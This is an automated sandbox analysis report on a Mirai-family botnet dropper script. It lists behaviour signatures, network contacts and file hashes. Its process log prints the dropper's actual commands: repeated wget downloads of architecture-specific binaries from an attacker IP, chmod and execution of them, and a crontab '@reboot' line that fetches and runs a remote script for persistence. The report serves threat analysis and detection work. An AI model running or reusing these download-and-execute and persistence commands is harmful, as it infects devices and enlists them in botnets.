Malware Analysis Report

2024-11-13 18:02

Sample ID 241109-d3k42awkcy
Target becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
SHA256 becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049
Tags
mirai botnet botnet defense_evasion discovery execution persistence privilege_escalatio
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049

Threat Level: Known bad

The file becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh was found to be: Known bad.

Malicious Activity Summary

mirai botnet botnet defense_evasion discovery execution persistence privilege_escalatio

Mirai family

Mirai

Renames itself

Unexpected DNS network traffic destination

File and Directory Permissions Modification

Executes dropped EXE

Creates/modifies Cron job

Changes its process name

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 03:32

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 03:32

Reported

2024-11-09 03:34

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

131s

Max time network

150s

Command Line

[/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/lib/dvrLocker N/A
N/A N/A /mnt/dvrLocker N/A
N/A N/A /mnt/dvrLocker N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 185.181.61.24 N/A N/A
Destination IP 80.152.203.134 N/A N/A
Destination IP 185.181.61.24 N/A N/A
Destination IP 5.161.109.23 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.YT83ty /usr/bin/crontab N/A
File opened for modification /var/spool/cron/crontabs/tmp.kafmbq /usr/bin/crontab N/A
File opened for modification /var/spool/cron/crontabs/tmp.wKc6UU /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself /bin/sh /etc/init.d/rcS /tmp/lib/dvrLocker N/A
Changes the process name, possibly in an attempt to hide itself mini_httpd /mnt/dvrLocker N/A
Changes the process name, possibly in an attempt to hide itself /bin/busybox ntpd /mnt/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh N/A

Processes

/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh

[/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/1024/exe]

/bin/ls

[ls -l /proc/1029/exe]

/bin/ls

[ls -l /proc/1043/exe]

/bin/ls

[ls -l /proc/1049/exe]

/bin/ls

[ls -l /proc/1062/exe]

/bin/ls

[ls -l /proc/1066/exe]

/bin/ls

[ls -l /proc/1068/exe]

/bin/ls

[ls -l /proc/1071/exe]

/bin/ls

[ls -l /proc/1078/exe]

/bin/ls

[ls -l /proc/1086/exe]

/bin/ls

[ls -l /proc/1090/exe]

/bin/ls

[ls -l /proc/1099/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/1109/exe]

/bin/ls

[ls -l /proc/1119/exe]

/bin/ls

[ls -l /proc/1123/exe]

/bin/ls

[ls -l /proc/1127/exe]

/bin/ls

[ls -l /proc/1131/exe]

/bin/ls

[ls -l /proc/1135/exe]

/bin/ls

[ls -l /proc/1139/exe]

/bin/ls

[ls -l /proc/1144/exe]

/bin/ls

[ls -l /proc/1148/exe]

/bin/ls

[ls -l /proc/1149/exe]

/bin/ls

[ls -l /proc/115/exe]

/bin/ls

[ls -l /proc/1152/exe]

/bin/ls

[ls -l /proc/1153/exe]

/bin/ls

[ls -l /proc/1156/exe]

/bin/ls

[ls -l /proc/1163/exe]

/bin/ls

[ls -l /proc/1164/exe]

/bin/ls

[ls -l /proc/1167/exe]

/bin/ls

[ls -l /proc/1170/exe]

/bin/ls

[ls -l /proc/1176/exe]

/bin/ls

[ls -l /proc/1181/exe]

/bin/ls

[ls -l /proc/1184/exe]

/bin/ls

[ls -l /proc/1186/exe]

/bin/ls

[ls -l /proc/1187/exe]

/bin/ls

[ls -l /proc/1190/exe]

/bin/ls

[ls -l /proc/1193/exe]

/bin/ls

[ls -l /proc/1196/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/1236/exe]

/bin/ls

[ls -l /proc/1241/exe]

/bin/ls

[ls -l /proc/1252/exe]

/bin/ls

[ls -l /proc/1253/exe]

/bin/ls

[ls -l /proc/1268/exe]

/bin/ls

[ls -l /proc/1288/exe]

/bin/ls

[ls -l /proc/1289/exe]

/bin/ls

[ls -l /proc/1298/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/130/exe]

/bin/ls

[ls -l /proc/1305/exe]

/bin/ls

[ls -l /proc/1321/exe]

/bin/ls

[ls -l /proc/1329/exe]

/bin/ls

[ls -l /proc/1336/exe]

/bin/ls

[ls -l /proc/1345/exe]

/bin/ls

[ls -l /proc/1357/exe]

/bin/ls

[ls -l /proc/1376/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/1479/exe]

/bin/ls

[ls -l /proc/1480/exe]

/bin/ls

[ls -l /proc/1483/exe]

/bin/ls

[ls -l /proc/1485/exe]

/bin/ls

[ls -l /proc/1486/exe]

/bin/ls

[ls -l /proc/1495/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/163/exe]

/bin/ls

[ls -l /proc/164/exe]

/bin/ls

[ls -l /proc/165/exe]

/bin/ls

[ls -l /proc/166/exe]

/bin/ls

[ls -l /proc/167/exe]

/bin/ls

[ls -l /proc/168/exe]

/bin/ls

[ls -l /proc/169/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/170/exe]

/bin/ls

[ls -l /proc/171/exe]

/bin/ls

[ls -l /proc/172/exe]

/bin/ls

[ls -l /proc/173/exe]

/bin/ls

[ls -l /proc/174/exe]

/bin/ls

[ls -l /proc/175/exe]

/bin/ls

[ls -l /proc/176/exe]

/bin/ls

[ls -l /proc/177/exe]

/bin/ls

[ls -l /proc/178/exe]

/bin/ls

[ls -l /proc/179/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/180/exe]

/bin/ls

[ls -l /proc/182/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/207/exe]

/bin/ls

[ls -l /proc/208/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/242/exe]

/bin/ls

[ls -l /proc/25/exe]

/bin/ls

[ls -l /proc/26/exe]

/bin/ls

[ls -l /proc/27/exe]

/bin/ls

[ls -l /proc/273/exe]

/bin/ls

[ls -l /proc/28/exe]

/bin/ls

[ls -l /proc/29/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/30/exe]

/bin/ls

[ls -l /proc/31/exe]

/bin/ls

[ls -l /proc/32/exe]

/bin/ls

[ls -l /proc/322/exe]

/bin/ls

[ls -l /proc/325/exe]

/bin/ls

[ls -l /proc/34/exe]

/bin/ls

[ls -l /proc/35/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/417/exe]

/bin/ls

[ls -l /proc/425/exe]

/bin/ls

[ls -l /proc/428/exe]

/bin/ls

[ls -l /proc/444/exe]

/bin/ls

[ls -l /proc/452/exe]

/bin/ls

[ls -l /proc/457/exe]

/bin/ls

[ls -l /proc/464/exe]

/bin/ls

[ls -l /proc/465/exe]

/bin/ls

[ls -l /proc/468/exe]

/bin/ls

[ls -l /proc/469/exe]

/bin/ls

[ls -l /proc/477/exe]

/bin/ls

[ls -l /proc/488/exe]

/bin/ls

[ls -l /proc/490/exe]

/bin/ls

[ls -l /proc/495/exe]

/bin/ls

[ls -l /proc/496/exe]

/bin/ls

[ls -l /proc/499/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/516/exe]

/bin/ls

[ls -l /proc/518/exe]

/bin/ls

[ls -l /proc/545/exe]

/bin/ls

[ls -l /proc/551/exe]

/bin/ls

[ls -l /proc/562/exe]

/bin/ls

[ls -l /proc/586/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/606/exe]

/bin/ls

[ls -l /proc/608/exe]

/bin/ls

[ls -l /proc/633/exe]

/bin/ls

[ls -l /proc/641/exe]

/bin/ls

[ls -l /proc/644/exe]

/bin/ls

[ls -l /proc/673/exe]

/bin/ls

[ls -l /proc/680/exe]

/bin/ls

[ls -l /proc/683/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/710/exe]

/bin/ls

[ls -l /proc/715/exe]

/bin/ls

[ls -l /proc/722/exe]

/bin/ls

[ls -l /proc/78/exe]

/bin/ls

[ls -l /proc/79/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/80/exe]

/bin/ls

[ls -l /proc/81/exe]

/bin/ls

[ls -l /proc/82/exe]

/bin/ls

[ls -l /proc/83/exe]

/bin/ls

[ls -l /proc/84/exe]

/bin/ls

[ls -l /proc/85/exe]

/bin/ls

[ls -l /proc/89/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/ls

[ls -l /proc/908/exe]

/bin/ls

[ls -l /proc/953/exe]

/bin/ls

[ls -l /proc/957/exe]

/bin/ls

[ls -l /proc/962/exe]

/bin/ls

[ls -l /proc/966/exe]

/bin/ls

[ls -l /proc/969/exe]

/bin/ls

[ls -l /proc/98/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
US 151.101.193.91:443 tcp
DE 80.152.203.134:53 kingstonwikkerink.dyn udp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 88.151.195.22:12795 kingstonwikkerink.dyn tcp
UA 45.202.35.91:80 45.202.35.91 tcp
GB 89.187.167.6:443 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
NO 185.181.61.24:53 kingstonwikkerink.dyn udp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 88.151.195.22:24968 kingstonwikkerink.dyn tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
GB 185.125.188.61:443 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
GB 185.125.188.61:443 tcp
US 5.161.109.23:53 kingstonwikkerink.dyn udp
UA 45.202.35.91:80 45.202.35.91 tcp
NO 185.181.61.24:53 kingstonwikkerink.dyn udp
BG 31.13.248.89:12243 kingstonwikkerink.dyn tcp

Files

/tmp/lib/dvrLocker

MD5 bb9275394716c60d1941432c7085ca13
SHA1 43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
SHA256 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
SHA512 047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d

/var/spool/cron/crontabs/tmp.YT83ty

MD5 aa6236daa7d70f1a76eb197a0c42f2e8
SHA1 86acf7fa9f0bb64920282a89d46dddded4391f31
SHA256 c68bab04e8a86ffc1a19fe66341b7c14212af3df011b57d61eb218a206ca4fab
SHA512 5c6f4a9c4a3cdb12b4370efe26fad53ce3a5b4bd8074a6960c24542eb74dbe870db84a188902dd837df9aaa52317cdb5c5fc0120dd28e25d19a98d0ee9128642

/var/spool/cron/crontabs/tmp.kafmbq

MD5 e58051ca9579fa36df18c83aa8016617
SHA1 901514003c1a32f945c7ebdb132bab290b2e9da3
SHA256 984911f805d18824cb0dbdad9ca9913c124669d9e3eb7102e4e576a48c98b7be
SHA512 735aa551bbe2ae83f338b5c7c4d064b86e989e9e717bfc5d308165a81a9840e0022e3e89dfef40e5817a582928d7c97f7ca3a3eea68d3a4cc9d859562b50e8f6

/var/spool/cron/crontabs/tmp.wKc6UU

MD5 3aa2a28ef3f5f27b7e64c32c9d716874
SHA1 7fa732c1a320d458ad84da4d885edc682c5a0600
SHA256 900a42d0127c2a27d4ce3029b9b0aa61a4a288012426476f9c801f59394b95b0
SHA512 e9e30db5a2a0da8f153399307ab378bb50ba03e87d0f4a9d3d5e4e4a294b51f51397478a163e2738ca0880f092f5922d5ac2d13c3834b1dc399c97bfbc4d2de2

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 03:32

Reported

2024-11-09 03:34

Platform

debian9-armhf-20240729-en

Max time kernel

15s

Max time network

17s

Command Line

[/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
